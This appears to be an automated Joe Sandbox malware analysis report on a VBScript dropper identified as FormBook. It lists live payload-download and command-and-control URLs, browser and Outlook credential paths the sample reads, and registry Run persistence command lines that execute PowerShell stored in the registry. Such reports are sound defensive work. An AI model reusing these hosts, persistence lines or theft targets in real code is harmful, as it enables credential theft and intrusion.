        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information221
        Scripting        		Valid Accounts1
        Windows Management Instrumentation        		221
        Scripting        		1
        Abuse Elevation Control Mechanism        		1
        Deobfuscate/Decode Files or Information        		1
        OS Credential Dumping        		2
        File and Directory Discovery        		Remote Services1
        Archive Collected Data        		1
        Ingress Tool Transfer        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		LSASS Memory15
        System Information Discovery        		Remote Desktop Protocol1
        Data from Local System        		1
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts11
        Command and Scripting Interpreter        		11
        Registry Run Keys / Startup Folder        		311
        Process Injection        		4
        Obfuscated Files or Information        		Security Account Manager1
        Query Registry        		SMB/Windows Admin Shares1
        Email Collection        		2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts2
        PowerShell        		Login Hook11
        Registry Run Keys / Startup Folder        		1
        Software Packing        		NTDS121
        Security Software Discovery        		Distributed Component Object ModelInput Capture2
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading        		LSA Secrets1
        Process Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Masquerading        		Cached Domain Credentials131
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Modify Registry        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
        Virtualization/Sandbox Evasion        		Proc Filesystem1
        Remote System Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
        Process Injection        		/etc/passwd and /etc/shadow1
        System Network Configuration Discovery        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Rundll32        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435413 Sample: 01105751.vbs Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 67 www.facesofhoustontx.com 2->67 69 timesrenewables.com 2->69 71 3 other IPs or domains 2->71 83 Snort IDS alert for network traffic 2->83 85 Malicious sample detected (through community Yara rule) 2->85 87 Antivirus detection for URL or domain 2->87 89 4 other signatures 2->89 12 wscript.exe 1 2->12         started        15 wab.exe 3 1 2->15         started        17 rundll32.exe 2->17         started        19 wab.exe 1 2->19         started        signatures3 process4 signatures5 105 VBScript performs obfuscated calls to suspicious functions 12->105 107 Suspicious powershell command line found 12->107 109 Wscript starts Powershell (via cmd or directly) 12->109 111 4 other signatures 12->111 21 powershell.exe 14 19 12->21         started        25 PING.EXE 1 12->25         started        27 cmd.exe 1 12->27         started        29 PING.EXE 1 12->29         started        process6 dnsIp7 73 87.121.105.54, 49713, 49721, 80 NET1-ASBG Bulgaria 21->73 91 Suspicious powershell command line found 21->91 93 Very long command line found 21->93 95 Found suspicious powershell code related to unpacking or dynamic code loading 21->95 31 powershell.exe 17 21->31         started        34 conhost.exe 21->34         started        36 cmd.exe 1 21->36         started        75 google.com 142.251.40.206 GOOGLEUS United States 25->75 38 conhost.exe 25->38         started        40 conhost.exe 27->40         started        42 conhost.exe 29->42         started        signatures8 process9 signatures10 119 Writes to foreign memory regions 31->119 121 Found suspicious powershell code related to unpacking or dynamic code loading 31->121 123 Hides threads from debuggers 31->123 44 wab.exe 2 7 31->44         started        47 cmd.exe 1 31->47         started        process11 signatures12 113 Maps a DLL or memory area into another process 44->113 115 Hides threads from debuggers 44->115 49 TsrCaEwNrfOKANGWcsg.exe 44->49 injected 52 cmd.exe 1 44->52         started        process13 signatures14 79 Maps a DLL or memory area into another process 49->79 81 Found direct / indirect Syscall (likely to bypass EDR) 49->81 54 xcopy.exe 1 13 49->54         started        57 reg.exe 1 1 52->57         started        59 conhost.exe 52->59         started        process15 signatures16 97 Tries to steal Mail credentials (via file / registry access) 54->97 99 Creates multiple autostart registry keys 54->99 101 Tries to harvest and steal browser information (history, passwords, etc) 54->101 103 2 other signatures 54->103 61 TsrCaEwNrfOKANGWcsg.exe 54->61 injected 65 firefox.exe 54->65         started        process17 dnsIp18 77 www.facesofhoustontx.com 34.174.122.2, 49725, 80 ATGS-MMD-ASUS United States 61->77 117 Found direct / indirect Syscall (likely to bypass EDR) 61->117 signatures19

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        01105751.vbs3%ReversingLabsWin32.Dropper.Generic

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
        https://go.micro0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        http://87.121.105.540%Avira URL Cloudsafe
        http://87.121.105.54/Ommestrup.deploy0%Avira URL Cloudsafe
        http://87.121.105.54/iYbZIhIVLPBjJUzImyrJN72.bin0%Avira URL Cloudsafe
        http://www.facesofhoustontx.com/gnto/?P2v=kzXtiRyPGhR4rzp&4v8xJ8=F2aKH/UhYyQy5bhtG47arqZTAzYBZHKo8pZvH2jiqbKPAiUNCKzfvPloMCIQjvvo+O//vWhBzU38U00+OJnukLQGsUBXCgymNTKCViCR5sTiLbhUlqXxexqjYjSB6xlfqI4lO2I=0%Avira URL Cloudsafe
        http://87.121.H0%Avira URL Cloudsafe
        http://87.121.105.54/Ommestrup.deployP0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        bg.microsoft.map.fastly.net
        		199.232.214.172
        		truefalse
          		unknown
          google.com
          		142.251.40.206
          		truefalse
            		high
            www.facesofhoustontx.com
            		34.174.122.2
            		truetrue
              		unknown
              timesrenewables.com
              		3.33.130.190
              		truetrue
                		unknown
                www.timesrenewables.com
                		unknown
                		unknownfalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://87.121.105.54/iYbZIhIVLPBjJUzImyrJN72.binfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.facesofhoustontx.com/gnto/?P2v=kzXtiRyPGhR4rzp&4v8xJ8=F2aKH/UhYyQy5bhtG47arqZTAzYBZHKo8pZvH2jiqbKPAiUNCKzfvPloMCIQjvvo+O//vWhBzU38U00+OJnukLQGsUBXCgymNTKCViCR5sTiLbhUlqXxexqjYjSB6xlfqI4lO2I=true
                  • Avira URL Cloud: safe
                  		unknown
                  http://87.121.105.54/Ommestrup.deployfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://87.121.105.54powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3288836081.000001EF2AE16000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://go.micropowershell.exe, 00000008.00000002.3288836081.000001EF2A2CC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Licensepowershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://aka.ms/pscore68powershell.exe, 00000008.00000002.3288836081.000001EF28DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.3288836081.000001EF28DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://87.121.Hpowershell.exe, 00000008.00000002.3288836081.000001EF2AFCA000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://87.121.105.54/Ommestrup.deployPpowershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              142.251.40.206
                              		google.comUnited States
                              		15169GOOGLEUSfalse
                              34.174.122.2
                              		www.facesofhoustontx.comUnited States
                              		2686ATGS-MMD-ASUStrue
                              87.121.105.54
                              		unknownBulgaria
                              		43561NET1-ASBGfalse

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1435413
                              Start date and time:2024-05-02 17:12:06 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 9m 47s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:26
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:2
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:01105751.vbs
                              renamed because original name is a hash value
                              Original Sample Name: _20240501105751.vbs
                              Detection:MAL
                              Classification:mal100.troj.spyw.expl.evad.winVBS@33/10@3/3
                              EGA Information:
                              • Successful, ratio: 40%
                              HCA Information:
                              • Successful, ratio: 91%
                              • Number of executed functions: 168
                              • Number of non-executed functions: 93
                              Cookbook Comments:
                              • Found application associated with file extension: .vbs

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded IPs from analysis (whitelisted): 199.232.214.172, 23.33.40.15, 23.33.40.7, 23.33.40.14, 23.33.40.26, 23.33.40.12, 23.33.40.13, 23.33.40.11, 23.33.40.19, 23.33.40.24
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                              • Execution Graph export aborted for target TsrCaEwNrfOKANGWcsg.exe, PID 4092 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 5692 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 6096 because it is empty
                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: 01105751.vbs

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              17:13:02API Interceptor1x Sleep call for process: wscript.exe modified
                              17:13:08API Interceptor84x Sleep call for process: powershell.exe modified
                              17:14:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Achaque %Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)
                              17:14:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Achaque %Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)
                              17:14:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run VLGXKP5HJL C:\Program Files (x86)\windows mail\wab.exe
                              17:15:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run VLGXKP5HJL C:\Program Files (x86)\windows mail\wab.exe

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              34.174.122.2confirmation de cuenta.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • www.facesofhoustontx.com/op6t/
                              FV- 12.429#U00a0TUSOCAL.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • www.facesofhoustontx.com/op6t/
                              FV- 12.429#U00a0TUSOCAL.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • www.facesofhoustontx.com/op6t/

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              www.facesofhoustontx.comconfirmation de cuenta.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • 34.174.122.2
                              FV- 12.429#U00a0TUSOCAL.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • 34.174.122.2
                              FV- 12.429#U00a0TUSOCAL.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • 34.174.122.2
                              bg.microsoft.map.fastly.netDHL0000879654982647865424.vbsGet hashmaliciousUnknownBrowse
                              • 199.232.214.172
                              http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                              • 199.232.214.172
                              https://www.opustrustweb.com/EmailTrackerAPI/open?token=eyJhbGciOiJkaXIiLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0..62tVk07eUS1tgkfaDkQOqQ.nL-JZjGlYSBu9AibCOqK7-wJ7VXqjfoMrgeXwHgP6tLPx4s2jjofEWjZh794Ex5FiocFlK50_YxzembNjUsYkjIjaFyaIpNIDSPFE46cBlrxNy-t9VcCVcfKZphrojE0.AXzXZielor8D6px-r_wTOg&url=https://minicursodamariana.fun/nu/slceitil@emfa.ptGet hashmaliciousHTMLPhisherBrowse
                              • 199.232.214.172
                              http://collectionsystem.veconinter.com:8002/Default.aspx?Pais=TMVb4l9krDsyWtcOACvZcw==&Tipo=5vw2xkejLdEpXNK8ckiYpA==&Val=Ju61jJ3lX3gIjnPLX+eDdQ==&Id=3243049&VR=1Get hashmaliciousUnknownBrowse
                              • 199.232.214.172
                              https://flow.page/efraudprevention.comGet hashmaliciousHTMLPhisherBrowse
                              • 199.232.214.172
                              swift copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 199.232.214.172
                              Notice.xlsGet hashmaliciousUnknownBrowse
                              • 199.232.210.172
                              D6OzFk32fU9xCHV.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 199.232.210.172
                              MehGCkAdgaX9oF0.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 199.232.210.172
                              https://www.multipli.com.auGet hashmaliciousUnknownBrowse
                              • 199.232.214.172

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              ATGS-MMD-ASUShttps://www.opustrustweb.com/EmailTrackerAPI/open?token=eyJhbGciOiJkaXIiLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0..62tVk07eUS1tgkfaDkQOqQ.nL-JZjGlYSBu9AibCOqK7-wJ7VXqjfoMrgeXwHgP6tLPx4s2jjofEWjZh794Ex5FiocFlK50_YxzembNjUsYkjIjaFyaIpNIDSPFE46cBlrxNy-t9VcCVcfKZphrojE0.AXzXZielor8D6px-r_wTOg&url=https://minicursodamariana.fun/nu/slceitil@emfa.ptGet hashmaliciousHTMLPhisherBrowse
                              • 34.36.216.150
                              c8sDO7umrx.exeGet hashmaliciousCMSBruteBrowse
                              • 57.128.101.155
                              https://herozheng.com/Get hashmaliciousUnknownBrowse
                              • 57.180.119.211
                              aduLTc2Dny.elfGet hashmaliciousMiraiBrowse
                              • 34.24.22.186
                              saq4WWKA5B.elfGet hashmaliciousMiraiBrowse
                              • 57.255.10.217
                              hCwh5R02fs.elfGet hashmaliciousMiraiBrowse
                              • 57.146.140.194
                              p67UidesWn.elfGet hashmaliciousMiraiBrowse
                              • 57.244.211.119
                              https://xdywna.com/Get hashmaliciousUnknownBrowse
                              • 57.180.70.0
                              https://www.soqsrkk.cn/Get hashmaliciousUnknownBrowse
                              • 57.180.70.0
                              https://2625819278.org/MIg2p2Get hashmaliciousHTMLPhisherBrowse
                              • 34.149.254.14
                              NET1-ASBGAqua.x86-20240502-1008.elfGet hashmaliciousUnknownBrowse
                              • 94.156.79.215
                              Aqua.arm7-20240502-1008.elfGet hashmaliciousMiraiBrowse
                              • 94.156.79.215
                              yibSQnyAI7.elfGet hashmaliciousMirai, OkiruBrowse
                              • 93.123.85.46
                              ryOgrdefvB.elfGet hashmaliciousMirai, OkiruBrowse
                              • 93.123.85.46
                              kdTZ0vraR2.elfGet hashmaliciousMirai, OkiruBrowse
                              • 93.123.85.46
                              jj5TL5MXzK.elfGet hashmaliciousMirai, OkiruBrowse
                              • 93.123.85.46
                              file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                              • 94.156.79.214
                              PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                              • 87.121.105.163
                              831107010C8578AD95A12C5498B03755EAC398B5BBC0D.exeGet hashmaliciousRisePro StealerBrowse
                              • 94.156.8.188
                              installerwn.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                              • 94.156.8.189

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                              Download File
                              Process:C:\Windows\System32\wscript.exe
